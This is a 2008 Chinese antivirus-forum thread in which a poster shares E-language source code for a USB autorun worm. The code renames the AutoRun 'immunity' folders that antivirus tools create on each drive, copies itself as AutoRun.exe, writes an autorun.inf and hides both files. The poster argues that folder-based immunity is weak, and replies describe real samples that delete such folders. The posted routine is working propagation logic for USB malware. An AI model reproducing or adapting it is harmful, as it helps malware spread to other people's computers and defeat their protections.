查看: 2231|回复: 5
收起左侧

[技术原创] [原创]杀软的目录法,防u马没大用-

[复制链接]
凝逸反毒
发表于 2008-12-17 12:17:58 | 显示全部楼层 |阅读模式
[原创]杀软的目录法,防u马没大用-看我写的u马,只用于技术分析,乱用后果自付,这个方法,已有u马用了,



.版本 2
.子程序 强U马生成
.局部变量 盘名, 文本型
.局部变量 行, 整数型
.局部变量 inf文件, 文本型
.局部变量 exe文件, 文本型


.计次循环首 (取数组成员数 (盘组), 行)
    盘名 = 盘组 [行]
    exe文件 = 盘名 + “AutoRun.exe”
    置文件属性 (inf文件, 32)
    置文件属性 (exe文件, 32)

    置随机数种子 ()

    文件更名 (inf文件, 盘名 + 到文本 (取随机数 (1000000, 99999999)))
    文件更名 (exe文件, 盘名 + 到文本 (取随机数 (1000000, 99999999)))

    复制文件 (取运行目录 () + “\” + 取执行文件名 (), exe文件)
    写到文件 (inf文件, #autorun)
    置文件属性 (exe文件, 4)
    置文件属性 (inf文件, 4)
.计次循环尾 ()


[ 本帖最后由 凝逸反毒 于 2008-12-17 12:25 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +19 收起 理由
chow2006 + 19 感谢分享

查看全部评分

凝逸反毒
 楼主| 发表于 2008-12-17 12:20:25 | 显示全部楼层
我见过  不少杀软是这样 防u马的


=====附件=====
运行 也没事,主exe,
主exe 只是生成
.版本 2
    inf文件 = 盘名 + “AutoRun.inf”
    exe文件 = 盘名 + “AutoRun.exe”

[ 本帖最后由 凝逸反毒 于 2008-12-17 12:23 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
挪威的冬天
发表于 2008-12-17 12:23:29 | 显示全部楼层
偷天换日?

给个 DEMO 试试看看
dl123100
发表于 2008-12-17 12:30:43 | 显示全部楼层
本来木马制作者如果注意到了这点,防一下也是很简单的事。
手头的一个Nsdownloader的样本,不仅能删安天、360等安软建立的免疫目录,也能删除uplus建立的fat32下的免疫文件。

[ 本帖最后由 dl123100 于 2008-12-17 12:35 编辑 ]
凝逸反毒
 楼主| 发表于 2008-12-17 12:32:03 | 显示全部楼层
原帖由 dl123100 于 2008-12-17 12:30 发表
本来木马制作者如果注意到了这点,防一下也是很简单的事。
手头的一个Nsdownloader的样本,不仅能删安天、360等安软建立的免疫目录,也能删除uplus建立的fat32下的免疫文件。


可 还有杀软 作出这样的功能
为了好看?
多管闲事
发表于 2008-12-17 19:05:59 | 显示全部楼层
现在好多U盘病毒根本不用autorun.inf,直接建立一个假文件夹图标的文件,就有人上去点了。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-11-1 07:41 , Processed in 0.135639 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表